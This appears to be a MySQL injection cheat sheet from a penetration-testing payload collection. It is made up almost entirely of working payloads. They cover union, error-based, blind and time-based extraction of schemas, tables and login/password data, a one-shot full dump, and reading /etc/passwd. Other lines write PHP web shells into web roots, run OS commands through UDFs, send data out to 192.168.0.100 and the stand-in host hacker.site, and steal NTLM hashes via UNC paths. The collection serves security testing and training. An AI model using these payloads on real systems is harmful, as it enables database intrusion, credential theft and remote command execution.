MYSQL Injection

Summary

MYSQL comment

  1. # MYSQL Comment
  2. /* MYSQL Comment */
  3. /*! MYSQL Special SQL */
  4. /*!32302 10*/ Comment for MYSQL version 3.23.02

MYSQL Union Based

Extract database with information_schema

First you need to know the number of columns, you can use order by.

  1. order by 1
  2. order by 2
  3. order by 3
  4. ...
  5. order by XXX

Then the following codes will extract the databases’name, tables’name, columns’name.

  1. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
  2. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
  3. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
  4. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

Extract columns name without information_schema

Method for MySQL >= 4.1.

First extract the column number with

  1. ?id=(1)and(SELECT * from db.users)=(1)
  2. -- Operand should contain 4 column(s)

Then extract the column name.

  1. ?id=1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)
  2. --Column 'id' cannot be null

Method for MySQL 5

  1. -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
  2. --#1060 - Duplicate column name 'id'
  4. -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
  5. -- #1060 - Duplicate column name 'name'
  7. -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
  8. ...

Extract data without columns name

Extracting data from the 4th column without knowing its name.

  1. select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;

Injection example inside the query select author_id,title from posts where author_id=[INJECT_HERE]

  1. MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
  2. +-----------+-----------------------------------------------------------------+
  3. | author_id | title                                                           |
  4. +-----------+-----------------------------------------------------------------+
  5. |         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
  6. +-----------+-----------------------------------------------------------------+

MYSQL Error Based

MYSQL Error Based - Basic

Works with MySQL >= 4.1

  1. (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  2. '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

MYSQL Error Based - UpdateXML function

  1. AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
  2. AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
  3. AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
  4. AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
  5. AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--

Shorter to read:

  1. ' and updatexml(null,concat(0x0a,version()),null)-- -
  2. ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -

MYSQL Error Based - Extractvalue function

Works with MySQL >= 5.1

  1. ?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
  2. ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
  3. ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
  4. ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
  5. ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--

MYSQL Blind

MYSQL Blind with substring equivalent

  1. ?id=1 and substring(version(),1,1)=5
  2. ?id=1 and right(left(version(),1),1)=5
  3. ?id=1 and left(version(),1)=4
  4. ?id=1 and ascii(lower(substr(Version(),1,1)))=51
  5. ?id=1 and (select mid(version(),1,1)=4)
  6. ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
  7. ?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

MYSQL Blind using a conditional statement

TRUE: if @@version starts with a 5:

  1. 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
  2. Response:
  3. HTTP/1.1 500 Internal Server Error

False: if @@version starts with a 4:

  1. 2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
  2. Response:
  3. HTTP/1.1 200 OK

MYSQL Blind with MAKE_SET

  1. AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
  2. AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
  3. AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
  4. AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)

MYSQL Blind with LIKE

‘_’ acts like the regex character ‘.’, use it to speed up your blind testing

  1. SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';

MYSQL Time Based

The following SQL codes will delay the output from MySQL.

  1. +BENCHMARK(40000000,SHA1(1337))+
  2. '%2Bbenchmark(3200,SHA1(1))%2B'
  3. AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
  4. RLIKE SLEEP([SLEEPTIME])
  5. OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))

Using SLEEP in a subselect

  1. 1 and (select sleep(10) from dual where database() like '%')#
  2. 1 and (select sleep(10) from dual where database() like '___')# 
  3. 1 and (select sleep(10) from dual where database() like '____')#
  4. 1 and (select sleep(10) from dual where database() like '_____')#
  5. 1 and (select sleep(10) from dual where database() like 'a____')#
  6. ...
  7. 1 and (select sleep(10) from dual where database() like 's____')#
  8. 1 and (select sleep(10) from dual where database() like 'sa___')#
  9. ...
  10. 1 and (select sleep(10) from dual where database() like 'sw___')#
  11. 1 and (select sleep(10) from dual where database() like 'swa__')#
  12. 1 and (select sleep(10) from dual where database() like 'swb__')#
  13. 1 and (select sleep(10) from dual where database() like 'swi__')#
  14. ...
  15. 1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#

Using conditional statements

  1. ?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
  2. ?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
  3. ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2

MYSQL DIOS - Dump in One Shot

  1. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
  2. (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#

MYSQL Current queries

This table can list all operations that DB is performing at the moment.

  1. union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #
  3. -- Dump in one shot example for the table content.
  4. union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 #

MYSQL Read content of a file

Need the filepriv, otherwise you will get the error : ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

  1. ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --

If you are root on the database, you can re-enable the LOAD_FILE using the following query

  1. GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#

MYSQL Write a shell

  1. SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
  2. SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
  3. -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
  4. [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
  5. [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

MYSQL Truncation

In MYSQL “admin“ and “admin“ are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.

  1. `username` varchar(20) not null

Payload: username = "admin a"

MYSQL UDF command execution

First you need to check if the UDF are installed on the server.

  1. $ whereis lib_mysqludf_sys.so
  2. /usr/lib/lib_mysqludf_sys.so

Then you can use functions such as sys_exec and sys_eval.

  1. $ mysql -u root -p mysql
  2. Enter password: [...]
  3. mysql> SELECT sys_eval('id');
  4. +--------------------------------------------------+
  5. | sys_eval('id') |
  6. +--------------------------------------------------+
  7. | uid=118(mysql) gid=128(mysql) groups=128(mysql) |
  8. +--------------------------------------------------+

MYSQL Out of band

  1. select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
  2. select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt

DNS exfiltration

  1. select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
  2. select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))

UNC Path - NTLM hash stealing

  1. select load_file('\\\\error\\abc');
  2. select load_file(0x5c5c5c5c6572726f725c5c616263);
  3. select 'osanda' into dumpfile '\\\\error\\abc';
  4. select 'osanda' into outfile '\\\\error\\abc';
  5. load data infile '\\\\error\\abc' into table database.table_name;

References